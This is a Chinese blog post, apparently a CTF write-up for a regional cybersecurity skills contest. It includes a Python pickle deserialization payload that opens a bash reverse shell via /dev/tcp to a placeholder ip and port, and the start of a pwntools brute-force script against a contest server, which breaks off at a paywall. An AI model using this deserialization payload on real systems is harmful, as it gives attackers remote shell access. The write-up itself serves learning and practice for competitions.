第二届黄河流域网络安全技能挑战赛WP

已于 2024-05-14 17:40:56 修改
阅读量1.4k 收藏 15
点赞数 13
分类专栏: 嗷嗷腾的CTF成长之路 文章标签: web安全 安全 网络安全 python lua rust 青少年编程
于 2024-05-13 16:56:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/How2Badlion/article/details/138809516
版权

WriteUP

TIP:可以留言给我换友链捏
第一次打ctf 之前只会做服务器取证 不知道为什么就第二了 可能运气比较好吧
由于我自己目前在取证工作中,也遇到很多ctf的问题,我个人非常喜欢做ctf的题目,但也会遇到ctf问题难以破解,全网ctf教程我都看完了,但是都觉得不够具体,所以我写一篇博客,希望以最具体的,实操演示的方式,向大家说明ctf的原理,希望与大家一起进步!

MyFavorPython

看看题 开局给了个登录界面 注册个账户直接进入

看到个Python unserialize的界面

推测是打Python反序列化漏洞

构造POC如下:

import base64
payload=b'''cos
system
(S"bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'"
tR.
'''
print(base64.b64encode(payload))

#ip和port自己填下

反弹shell后直接cat /flag.txt
在这里插入图片描述

Fuzzzz

nc起手 试了几下在找到两个hint

提示len(random_str)=3 secret的长度为10

直接输入10个字符遍历一下

发现有些会变成+

推测+代表正确的字符

遍历出固定的字符为S4PcSec后直接写个爆破脚本

不会写的同学去给GPT嗦牛牛让他帮你

#!/usr/bin/env python

# -*- encoding: utf-8 -*-

from pwn import *

context.log_level='debug'

from pwn import *

import string

# 连接到服务器

conn = remote('116.62.53.46', 2333)

# 爆破后三位字符

correct_strings = []

for char1 in string.printable:

    test_string = 'S4PcSec' + char1 + char1 + char1

    # 发送选项并接收

    conn.recvuntil('Choose an option(1 or 2):')

    conn.sendline('1')

    conn.recvuntil('Fuzz>')

    # 发送测试字符串

    conn.sendline(test_string)

    

    # 接收服务器响应

    response = conn.recvline().strip()

    

    # 根据 '+' 的位置确定哪个字符是正确的

    correct_char_index = response.find(
最低0.47元/天 解锁文章
WP】第一届 “帕鲁杯“ - CTF挑战赛 Web 全解
m0_63138919的博客
05-06 1677
WP】第一届 "帕鲁杯" - CTF挑战赛 Web 全解
黄河流域数据集含dem和流域资料等,具体涉及黄河流域城市点,干流、湖泊、流域界线、重点直流、黄土高原地区界等等,资料很详细,点赞
04-02
2. **矢量数据**:数据集中包含的黄河流域.shp文件是一种矢量数据格式,通常包含了线(河流、道路)和面(湖泊、流域边界)两种类型的信息。线数据描述了黄河流域的干流走向、支流分布,而面数据则涵盖了湖泊的形状...
黄河流域公安院校网络空间安全技能挑战赛 QAQ 题解
OrientalGlass的博客
03-05 759
这题是对python打包成的可执行程序逆向。
[工控CTF]2021工业信息安全技能大赛(江西站)-WP
3tefanie丶zhou的博客
09-30 7193
【吾有所思人,隔在远远乡】
【CTF-WP】2023年江苏“领航杯”线上选拔赛MISC部分 WP
碎冰冰
08-25 1912
然后我们在尾部发现了一个RC4,这时候想又没有一种可能是RC4有关了,百度查寻得知RC4是一种加密方法,解迷需要一个key, 嗯这时候突然想到了之前在txt文档中提到key是一组12位纯数字,12位,水仙花;解压附件压缩包,获得5414个txt文档,随机打卡后发现是base64加密的二进制字符内容,所以我们需要按照顺序将每个文件的内容写到一个文件里面,方便后面的base64解码;我们观察到每个文件的名称其实是一段MD5值,我们尝试使用MD5碰撞出内容得知,每个文件的名称都是一个4位的阿拉伯数字。
第九届中国海洋大学信息安全竞赛-WP by Rweb
m0_75243362的博客
04-27 1357
因为是新生赛嘛,题目还是比较简单的,不错很适合我玩哈哈哈,就差一丢丢拿奖,可惜呜呜,采购们的wp罢了,希望师傅们批评指正。
CTF工控工业互联网(ISC)复现总结WP(超详细)
Aluxian_的博客
12-07 5457
工控领域的TCP协议,有时wireshark会将response包解析为tcp协议,影响做题,如果筛选mms时出现连续request包,考虑wireshark解析错误,将筛选条件删除手动看一下。我们在SCADA 工程中写入了flag字段,请获取该工程flag,flag形式为 flag{}。工业网络中存在异常,尝试通过分析PCAP流量包,分析出流量数据中的异常点,并拿到FLAG。格式为 flag{}某10段工控网络中,工业协议中存在异常数据。2019-工业信息安全技能大赛-深圳站-工业协议分析1。
黄河流域水土保持边界数据:包括泥沙区界、支流区界、流域界、流域省界等
07-14
黄河流域水土保持边界数据:包括泥沙区界、支流区界、流域界、流域省界等; 该数据集较为齐全,统一采用WGS-84坐标系统; 数据集所包含数据的格式均为shapefile(shp)格式,数据完整; 该数据集可用于实验分析和...
黄河流域河网shp格式矢量数据
04-04
黄河流域河网shp格式矢量数据; 黄河流域河网shp格式矢量数据; 黄河流域河网shp格式矢量数据; 数据来源于DEM提取获得,源DEM数据使用格式为ASTER GDEM V3版本,分辨率为30米的DEM数据,通过计算流向、流量阈值等从...
黄河流域TIFF格式的DEM数据
03-03
黄河流域的地形地貌是地理研究中的重要组成部分,而DEM(Digital Elevation Model,数字高程模型)正是描述地表地形特征的关键数据。本资源提供的是一套黄河流域的DEM数据,以TIFF(Tagged Image File Format)格式...
二级支流_二级河流_黄河流域水系_黄河流域_二级支流_
10-04
"二级支流_二级河流_黄河流域水系_黄河流域_二级支流_"这一标题揭示了文件的核心内容,即关于黄河流域二级支流的地理信息数据。 "描述"部分提到,这些是黄河流域二级支流的shp文件,且已经过修正,非常适合用作底图...
黄河流域ctf
W231229的博客
05-12 400
我们主要是看回显这里的base64是被混淆了的,我们要把开头的一些东西删掉。打开流量,过滤http。随便复制了一个post。
2024黄河流域比赛的复现
2401_82388450的博客
06-14 1361
var __tmp2"}} 进行 extend 操作,所以我们就需要让 username 等于 __proto_,想要这样,就需要创建用户,就回到/addAdmin路由,所以我们就需要admin的token。在JavaScript发展历史上,很少有真正的私有属性,类的所有属性都允许被公开的访问和修改,包括proto,构造函数和原型。原型对象也可能拥有原型,并从中继承方法和属性,一层一层、以此类推。原型链是javascript的实现的形式,递归继承原型对象的原型,原型链的顶端是Object的原型。
Web-Python-Revenge-第二届黄河流域公安院校网络空间安全技能邀请赛
Sa1nZen的博客
05-19 418
Web-Python-Revenge-第二届黄河流域公安院校网络空间安全技能邀请赛
黄河流域公安院校网络空间安全技能挑战赛】部分wp
leekos的博客,分享web安全相关知识~
03-07 1131
黄河流域公安院校网络空间安全技能挑战赛】部分wp
Rust日报】2023-04-16 用 Rust 编写的 lua 字节码解析器
Rust语言学习交流
04-17 735
Rust 编写的 lua 字节码解析器https://github.com/metaworm/luac-parser-rslua字节码解析器,目前支持lua51、lua52、lua53、lua54、luajit这是metaworm的luadec的一部分,是目前最好的lua反编译器您可以根据此代码编写您的自定义 luac 解析器,它可以编译为 WASM 并由metaworm 的 luadec加载...
2021L3HCTF luuuuua Writeup
qq_41866334的博客
11-15 5662
2021 L3HCTF luuuua Writeup AAA:immortal 这题做完以后感觉和ByteCTF2021的language binding很像,这是我之前写的Writeup 。 首先打开java层,发现asserts/res/test.lua里的逻辑是假的。然后通过LoginActivity里的afterTextChanged方法找到关键的b.c.a.b.a.d。 注意它 import org.keplerproject.luajava.LuaState; import org.ke
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
最新发布
iaast的博客
04-28 464
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
2025蓝桥杯省赛网络安全wp
2301_79035389的博客
04-27 786
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值